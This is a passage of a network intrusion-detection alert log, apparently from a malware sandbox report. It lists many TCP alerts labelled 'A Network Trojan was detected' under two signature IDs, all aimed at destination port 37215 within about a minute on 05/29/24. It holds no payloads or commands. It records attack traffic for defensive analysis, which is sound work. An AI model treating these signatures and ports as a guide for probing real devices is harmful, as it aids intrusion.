                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666113
                SID:2835222
                Source Port:42088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655659
                SID:2829579
                Source Port:55406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113398
                SID:2835222
                Source Port:51160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782525
                SID:2829579
                Source Port:33114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943986
                SID:2829579
                Source Port:50636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854145
                SID:2829579
                Source Port:39276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764080
                SID:2835222
                Source Port:59048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808589
                SID:2829579
                Source Port:50694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228829
                SID:2829579
                Source Port:57208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532206
                SID:2835222
                Source Port:33716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135796
                SID:2835222
                Source Port:34708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564804
                SID:2835222
                Source Port:40870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072401
                SID:2829579
                Source Port:59528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547268
                SID:2829579
                Source Port:39830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472075
                SID:2835222
                Source Port:37666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461383
                SID:2829579
                Source Port:57046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782937
                SID:2835222
                Source Port:36090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965489
                SID:2835222
                Source Port:35886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854649
                SID:2829579
                Source Port:35786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567126
                SID:2829579
                Source Port:40824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322945
                SID:2835222
                Source Port:41656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361558
                SID:2835222
                Source Port:53956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722421
                SID:2835222
                Source Port:58700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873559
                SID:2829579
                Source Port:49020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655166
                SID:2829579
                Source Port:43524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948519
                SID:2835222
                Source Port:39416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971794
                SID:2829579
                Source Port:47026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786670
                SID:2835222
                Source Port:44460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855131
                SID:2829579
                Source Port:53122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360288
                SID:2835222
                Source Port:54244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901224
                SID:2835222
                Source Port:32970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985710
                SID:2829579
                Source Port:39110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029810
                SID:2829579
                Source Port:43964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444434
                SID:2835222
                Source Port:60560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962238
                SID:2835222
                Source Port:36952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514332
                SID:2829579
                Source Port:44964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025641
                SID:2829579
                Source Port:37932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526516
                SID:2829579
                Source Port:40538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066790
                SID:2829579
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783916
                SID:2829579
                Source Port:51896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332421
                SID:2835222
                Source Port:51238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778423
                SID:2829579
                Source Port:43210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675222
                SID:2829579
                Source Port:45546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228974
                SID:2835222
                Source Port:54820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654572
                SID:2835222
                Source Port:56596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902384
                SID:2829579
                Source Port:47894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505397
                SID:2829579
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.741992
                SID:2835222
                Source Port:46858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.070329
                SID:2829579
                Source Port:59340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618747
                SID:2829579
                Source Port:49232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179017
                SID:2835222
                Source Port:56780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140859
                SID:2835222
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022298
                SID:2829579
                Source Port:34086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155055
                SID:2835222
                Source Port:57126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712865
                SID:2835222
                Source Port:40984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015425
                SID:2835222
                Source Port:45052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665693
                SID:2829579
                Source Port:45666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788497
                SID:2829579
                Source Port:50048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552210
                SID:2835222
                Source Port:33958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942631
                SID:2829579
                Source Port:38576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.802276
                SID:2829579
                Source Port:54402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.029697
                SID:2835222
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654702
                SID:2829579
                Source Port:57692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447292
                SID:2829579
                Source Port:37898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334650
                SID:2835222
                Source Port:59854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782904
                SID:2835222
                Source Port:32912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958168
                SID:2835222
                Source Port:57232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883617
                SID:2829579
                Source Port:54198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844556
                SID:2829579
                Source Port:47980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734488
                SID:2829579
                Source Port:34088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667780
                SID:2835222
                Source Port:40352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438631
                SID:2835222
                Source Port:40304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013808
                SID:2835222
                Source Port:37318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189632
                SID:2835222
                Source Port:56106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265383
                SID:2835222
                Source Port:39568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184397
                SID:2835222
                Source Port:45708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555723
                SID:2835222
                Source Port:36956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.718074
                SID:2835222
                Source Port:35810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.775131
                SID:2829579
                Source Port:54142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225952
                SID:2835222
                Source Port:52162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.863949
                SID:2835222
                Source Port:35814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387224
                SID:2835222
                Source Port:60642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.440243
                SID:2835222
                Source Port:43448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558077
                SID:2829579
                Source Port:39676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853344
                SID:2835222
                Source Port:36758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2829579
                Source Port:40652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215693
                SID:2835222
                Source Port:44454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.270306
                SID:2835222
                Source Port:50536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558277
                SID:2835222
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979404
                SID:2835222
                Source Port:42888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793635
                SID:2835222
                Source Port:57288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835777
                SID:2835222
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685657
                SID:2829579
                Source Port:57190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228539
                SID:2829579
                Source Port:33168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823501
                SID:2829579
                Source Port:44274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328426
                SID:2835222
                Source Port:38224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008690
                SID:2835222
                Source Port:50292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649653
                SID:2829579
                Source Port:51212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559251
                SID:2829579
                Source Port:56000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363187
                SID:2829579
                Source Port:48286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225590
                SID:2829579
                Source Port:57712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025145
                SID:2829579
                Source Port:49590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113243
                SID:2829579
                Source Port:37630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668640
                SID:2829579
                Source Port:33680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.942924
                SID:2829579
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557811
                SID:2835222
                Source Port:49956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036980
                SID:2829579
                Source Port:39796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926909
                SID:2829579
                Source Port:43424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896895
                SID:2829579
                Source Port:43072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521226
                SID:2835222
                Source Port:44252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504246
                SID:2835222
                Source Port:53056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818048
                SID:2829579
                Source Port:59544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413544
                SID:2829579
                Source Port:51100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934189
                SID:2829579
                Source Port:55666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653366
                SID:2835222
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714087
                SID:2829579
                Source Port:55634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557158
                SID:2835222
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421140
                SID:2835222
                Source Port:35634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.818214
                SID:2829579
                Source Port:50896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464806
                SID:2829579
                Source Port:51914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652509
                SID:2829579
                Source Port:42648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535992
                SID:2829579
                Source Port:50086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324599
                SID:2829579
                Source Port:49320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432523
                SID:2835222
                Source Port:34000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212939
                SID:2829579
                Source Port:48704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863485
                SID:2829579
                Source Port:42062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042890
                SID:2835222
                Source Port:33006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228581
                SID:2829579
                Source Port:54326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421729
                SID:2835222
                Source Port:52688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534228
                SID:2835222
                Source Port:60590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730338
                SID:2829579
                Source Port:38886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854130
                SID:2835222
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334732
                SID:2835222
                Source Port:49160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363160
                SID:2829579
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955718
                SID:2829579
                Source Port:49870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232037
                SID:2829579
                Source Port:44716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274242
                SID:2835222
                Source Port:58812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734419
                SID:2829579
                Source Port:58634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.593598
                SID:2835222
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166268
                SID:2829579
                Source Port:34342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560953
                SID:2835222
                Source Port:48804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140280
                SID:2835222
                Source Port:60136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784767
                SID:2835222
                Source Port:51304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909233
                SID:2835222
                Source Port:58448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949544
                SID:2829579
                Source Port:53364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725468
                SID:2835222
                Source Port:37012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785113
                SID:2835222
                Source Port:43142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499165
                SID:2829579
                Source Port:46378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689098
                SID:2829579
                Source Port:34344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840321
                SID:2829579
                Source Port:42808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236668
                SID:2835222
                Source Port:49500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665272
                SID:2829579
                Source Port:50044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419604
                SID:2829579
                Source Port:39304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586703
                SID:2835222
                Source Port:60828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728778
                SID:2835222
                Source Port:47412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858934
                SID:2835222
                Source Port:52314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387571
                SID:2829579
                Source Port:47672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.271993
                SID:2835222
                Source Port:46120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561794
                SID:2835222
                Source Port:41704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904991
                SID:2835222
                Source Port:34904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903507
                SID:2835222
                Source Port:54664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778345
                SID:2835222
                Source Port:60760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232013
                SID:2835222
                Source Port:37264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779566
                SID:2829579
                Source Port:38154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964620
                SID:2829579
                Source Port:43968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731862
                SID:2835222
                Source Port:48766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227312
                SID:2829579
                Source Port:55934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653004
                SID:2835222
                Source Port:44198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505029
                SID:2829579
                Source Port:42324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944191
                SID:2829579
                Source Port:42280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231277
                SID:2835222
                Source Port:45112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321198
                SID:2829579
                Source Port:38416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881274
                SID:2829579
                Source Port:57036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091244
                SID:2835222
                Source Port:42016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686862
                SID:2835222
                Source Port:58464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161129
                SID:2835222
                Source Port:46438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360493
                SID:2829579
                Source Port:58504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436334
                SID:2835222
                Source Port:36426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319271
                SID:2829579
                Source Port:37338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418621
                SID:2835222
                Source Port:52768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574969
                SID:2829579
                Source Port:51132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968336
                SID:2829579
                Source Port:56584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631282
                SID:2829579
                Source Port:33976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071362
                SID:2829579
                Source Port:46944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684283
                SID:2835222
                Source Port:41948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282771
                SID:2835222
                Source Port:59532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666315
                SID:2835222
                Source Port:49218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162705
                SID:2829579
                Source Port:36298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868529
                SID:2829579
                Source Port:36972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932166
                SID:2835222
                Source Port:37716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717324
                SID:2835222
                Source Port:59152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042028
                SID:2829579
                Source Port:47872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862155
                SID:2829579
                Source Port:34262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763111
                SID:2829579
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277431
                SID:2829579
                Source Port:38138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726209
                SID:2829579
                Source Port:43770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316084
                SID:2829579
                Source Port:34024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
